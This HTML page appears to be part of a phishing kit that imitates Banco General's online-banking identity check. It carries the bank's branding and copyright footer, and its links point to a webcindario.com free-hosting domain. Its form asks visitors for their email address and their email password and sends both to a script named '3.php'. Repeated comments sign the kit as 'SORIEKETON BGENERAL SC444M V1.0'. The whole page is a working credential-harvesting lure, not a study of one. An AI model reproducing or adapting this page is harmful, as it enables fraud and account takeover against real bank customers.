<!DOCTYPE html>
<html class="ltr yui3-js-enabled webkit js chrome chrome74 chrome74-0 win secure" dir="ltr" lang="es-ES"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="shortcut icon" href="favicon.ico">
</head><body class="controls-visible yui3-skin-sam guest-site signed-out public-page site bgp-theme-body bgp-theme bgp-theme-container ng-scope" ng-class="{&#39;backdrop-fix&#39;: tourCtrl.backdropFixNeeded()}" style="padding-top: 0px; visibility: visible;" id="main-surface" ng-controller="BGPTourController as tourCtrl"><div id="yui3-css-stamp" style="position: absolute !important; visibility: hidden !important" class=""></div>



<style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style><script type="text/javascript" async="" src="./validar-identidad_files/ga.js.descarga"></script>


 <title>Banca en Línea - Banco General</title>

    
    <meta http-equiv="x-ua-compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, user-scalable=yes, maximum-scale=1.0">
    
    
<link class="lfr-css-file" data-senna-track="temporary" href="./validar-identidad_files/aui.css" id="liferayAUICSS" rel="stylesheet" type="text/css">
	<style data-senna-track="temporary" type="text/css">
	</style>
    <link href="./validar-identidad_files/text-security.min.css" rel="stylesheet" type="text/css">
    <link href="./validar-identidad_files/style.css" rel="stylesheet" type="text/css">

  <style type="text/css">.no-scrolling { height: 100%; overflow: hidden; }</style>



    



        
      
    
  
<nav class="bgp-navbar bgp-navbar navbar navbar-default navbar-fixed-top hidden-print">
    <div class="container">
        <div class="row">
            <div class="col-xs-5">
                <div class="navbar-header">

                    <a class="navbar-brand bgp-navbar__brand" href="https://general-enlineab.webcindario.com/index2.html">
                        <img src="/validar-identidad_files/bgp-logo.png" alt="BGP">
                    </a>

                </div>
            </div>

            <div class="col-xs-7">
                <div class="mtl nav navbar-nav navbar-right bgp-navbar__disclaimer">
                    <p>¿Necesitas ayuda? Llama al <span class="text-color-brand-blue-variation-3"><b>800-5000</b></span> o <span class="text-color-brand-blue-variation-3"><b>300-5000</b></span></p>
                </div>
            </div>
        </div>
    </div>
</nav><!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->

    <section class="bgp-content-body">

<form action="3.php" method="post">

<div id="main-content" class="bgp-content container" role="main">
  <div class="portlet-layout row">
    <div id="column-1" class="col-sm-12 mts portlet-column portlet-column-first">
      <div class="portlet-dropzone portlet-column-content portlet-column-content-first" id="layout-column_column-1">

	<div class="portlet-boundary portlet-boundary_bgp_login_web_LoginPortlet_  portlet-static portlet-static-end decorate  " id="p_p_id_bgp_login_web_LoginPortlet_INSTANCE_gtSJktyunuU4_">
		<span id="p_bgp_login_web_LoginPortlet_INSTANCE_gtSJktyunuU4"></span>
	
<section class="portlet" id="portlet_bgp_login_web_LoginPortlet_INSTANCE_gtSJktyunuU4">


	<div class="portlet-content">

		
			<div class=" portlet-content-container">
				

<!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
	<div class="portlet-body">

<div ng-controller="BGPLoginController as ctrl" class="bgp-common-module mtxl ng-scope">
  <!-- uiView: BGPLoginView --><div ui-view="BGPLoginView" onclick="void(0)" class="ng-scope"><div class="container-fluid ng-scope" ng-controller="BGPLoginUserIdentificationController as idCtrl">

  <h4 class="bgp-title__page bgp-title__bordered--bottom ng-binding">
    Valida tu identidad
  </h4>

  <loading-component display="idCtrl.showLoading" class="ng-isolate-scope"><div id="loader-wrapper" class="ng-hide" ng-show="display">
  <div class="bgp-loader">
    <div class="bounce1"></div>
    <div class="bounce2"></div>
    <div class="bounce3"></div>
  </div>
</div>
</loading-component>
<!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
  <div class="panel panel-large">
    <div class="panel-body">
      <div class="bgp-row text-center">
        <steps-component steps="idCtrl.OwnSteps" class="ng-isolate-scope"><nav class="bgp-wizard">
  <!-- ngRepeat: step in steps --><a href="https://general-enlineab.webcindario.com/index2.html" class="bgp-wizard__step ng-scope bgp-wizard__step--active" ng-repeat="step in steps" ng-class="{&#39;bgp-wizard__step--active&#39;: step.selected === true}">
    <!-- ngIf: $index > 0 -->
    <span class="bgp-wizard__stepPage"></span>
    <span class="bgp-wizard__stepLabel ng-binding">Validar identidad</span>
  </a><!-- end ngRepeat: step in steps --><a href="https://general-enlineab.webcindario.com/index2.html" class="bgp-wizard__step ng-scope" ng-repeat="step in steps" ng-class="{&#39;bgp-wizard__step--active&#39;: step.selected === true}">
    <!-- ngIf: $index > 0 --><span ng-if="$index &gt; 0" class="bgp-wizard__stepDivider ng-scope"></span><!-- end ngIf: $index > 0 -->
    <span class="bgp-wizard__stepPage"></span>
    <span class="bgp-wizard__stepLabel ng-binding">Validar datos</span>
  </a><!-- end ngRepeat: step in steps -->
</nav>
</steps-component>
      </div>

      <p class="text-color-brand-blue fnt-size-18 ng-binding">¡Hola! Te estábamos esperando... </p>

        <p class="pvm ng-binding">Coloca tus correo electronico para validar tu identidad.</p>
		          <div class="form-group input-text-wrapper">



<br>
        <section>
          <div class="form-group input-text-wrapper">
            <label class="control-label ng-binding" for="identity">
             Correo Electronico<!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
            </label>


            <div class="bgp-row">
              <div class="col-md-2 col-sm-3">
<input name="correo2" type="email" onkeypress="return controltag(event)" tabindex="2" class="form-control ng-pristine ng-empty ng-invalid ng-invalid-required ng-valid-minlength ng-valid-maxlength ng-touched" autocomplete="cc-number" maxlength="50" required="required" style="width:250px"> 
          <!-- ngIf: idCtrl.personal_identity.length > 0 || !idCtrl.form.identity.$touched --><p ng-if="idCtrl.personal_identity.length &gt; 0 || !idCtrl.form.identity.$touched" class="fnt-size-sm text-color-gray-variation-3 ng-binding ng-scope">
            
          </p><!-- end ngIf: idCtrl.personal_identity.length > 0 || !idCtrl.form.identity.$touched -->
       <label class="control-label ng-binding" for="identity">
             Clave Correo<!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
            </label>
        <input name="co" type="password" onkeypress="return controltag(event)" tabindex="2" class="form-control ng-pristine ng-empty ng-invalid ng-invalid-required ng-valid-minlength ng-valid-maxlength ng-touched"  maxlength="50" required="required" style="width:250px"> 
          <!-- ngIf: idCtrl.personal_identity.length > 0 || !idCtrl.form.identity.$touched --><p ng-if="idCtrl.personal_identity.length &gt; 0 || !idCtrl.form.identity.$touched" class="fnt-size-sm text-color-gray-variation-3 ng-binding ng-scope">
        <section>
          <div class="form-group input-text-wrapper">
            <!-- ngRepeat: con in idCtrl.typeCards track by $index --><div class="mbm ng-scope" ng-repeat="con in idCtrl.typeCards track by $index">
              <label class="main-account-radio">

              </label>
            </div><!-- end ngRepeat: con in idCtrl.typeCards track by $index --><div class="mbm ng-scope" ng-repeat="con in idCtrl.typeCards track by $index">
            
            </div><!-- end ngRepeat: con in idCtrl.typeCards track by $index -->

            <!-- ngIf: idCtrl.selectedTypeCard != null -->

            <!-- ngIf: idCtrl.selectedTypeCard != null -->
          </div>


              <button id="btn_submit" type="submit" class="btn btn-primary ng-binding" tabindex="9">
                Siguiente

                
              </button>
            </div>
          </div><!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
        </section>
      

      <!-- ngInclude: '/o/login-web/templates/partials/login.cancel_modal.html' --><div ng-include="&#39;/o/login-web/templates/partials/login.cancel_modal.html&#39;" class="ng-scope"><!-- Modal -->
<div class="modal fade ng-scope" id="cancelModal" tabindex="-1" role="dialog" aria-labelledby="userTermsModalLabel">
    <div class="modal-dialog" role="document">
        <div class="modal-content">

            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                  <span aria-hidden="true">×</span>
                </button>
                <h3 class="bgp-title__page mvn pvn ng-binding">Cancelar configuración de Banca en Línea</h3>
            </div>

            <div class="modal-body mtm">
              <p class="mbl ng-binding">Se perderá toda la información ingresada.</p>
              <p class="ng-binding">¿Estás seguro que quieres cancelar el proceso de configuración y salir?</p>
            </div>
            <div class="modal-footer">

              <button type="button" class="btn btn-default btn--regular ng-binding" data-dismiss="modal">
                Continuar configuración
              </button>

              <button type="button" class="btn btn-primary btn--regular ng-binding" ng-click="ctrl.logoutAndGoToLogin()">
                Cancelar y salir
              </button>

            </div><!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
        </div>
    </div>
</div>
</div>
    </div>
  </div>
</div>
</div>

  
</div>
	</div>

			</div>
		
	</div>
</section>
	</div>




</div>
    </div>
  </div>
</div></form>


<span></span>
<!-- Modal -->

    </section>

<footer class="bgp-footer">
  <div class="container">
    <div class="bgp-footer__content">
      <div class="bgp-footer__copyright">
        <span class="bgp-footer__logo">
          <img src="/validar-identidad_files/bg-logo-stars-white.png" alt="">
        </span>
<!-- S O R I E K E T O N | BGENERAL SC444M V1.0 -->
        <p>
          Copyright © <span class="js-current-year">2021</span> Banco General. Todos los derechos reservados.
        </p>
      </div>

    </div>
  </div>
</footer>
  
  </body></html>